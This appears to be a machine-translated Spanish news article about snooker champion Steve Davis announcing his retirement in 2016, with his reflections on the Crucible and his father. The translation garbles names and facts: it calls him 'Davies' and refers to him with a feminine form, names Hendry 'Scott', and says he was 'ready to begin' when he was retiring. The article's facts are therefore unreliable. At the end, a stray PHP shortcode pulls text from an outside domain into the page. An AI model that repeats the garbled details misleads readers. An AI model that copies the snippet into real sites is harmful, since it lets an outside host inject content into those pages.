El seis veces campeón mundial Steve Davis anunció su retiro del snooker el mismo día de 2016.


Davis se retiró del deporte a la edad de 58 años después de perder en la primera ronda de clasificación del Campeonato Mundial, confirmando en su mente que había llegado el momento de terminar una ilustre carrera.


Después de 38 años como profesional, 28 títulos de ranking, tres coronas de Masters, 355 siglos y una inolvidable final de blackball contra Dennis Taylor, estaba listo para comenzar.


Y a pesar de su incapacidad para dar un canto del cisne en las etapas televisadas en el Crucible, Davis fue invitada nuevamente para aparecer en la final frente a una multitud entusiasta, que le dio una gran ovación a la ocasión.


Davies, bajo la dirección de su padre Bill y su manager Barry Hearn, fue una figura dominante en Sheffield durante la década de 1980, ganando títulos mundiales en 1981, 1983, 1984, 1987, 1988 y 1989.


Fue derribado de su posición por la estrella en ascenso Stephen Hendry, declarando alegremente que Scott “vino y se comió todos mis dulces”.


La partida de Davis estuvo teñida de tristeza por la muerte de su padre, pero no tenía ninguna duda de que había hecho lo correcto al ver que su ventaja competitiva llegaba a su fin.


“No quiero jugar más, es demasiado difícil”, dijo.


“Hubo partidos que me olvidé cuando me subí al auto. El día que te fuiste a tu casa y dos o tres días después estabas enojado y no te calmabas. Vi que no importaba mucho. .


“Se me ocurrió que tal vez era el momento adecuado para parar. Los últimos años han sido difíciles porque no tienes mucho éxito y definitivamente lo estaba haciendo por mi papá”.


No había para él mejor lugar para despedirse que el teatro que le regalaba los mejores momentos.


“He tenido momentos en el Crisol en los que fue el lugar más maravilloso y no me gustaría estar en ningún otro lugar”, dijo.


Davis continúa jugando partidos de exhibición, incluida una recreación de su dramático cuadro final contra Taylor el año pasado, y trabaja como comentarista para la BBC.


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');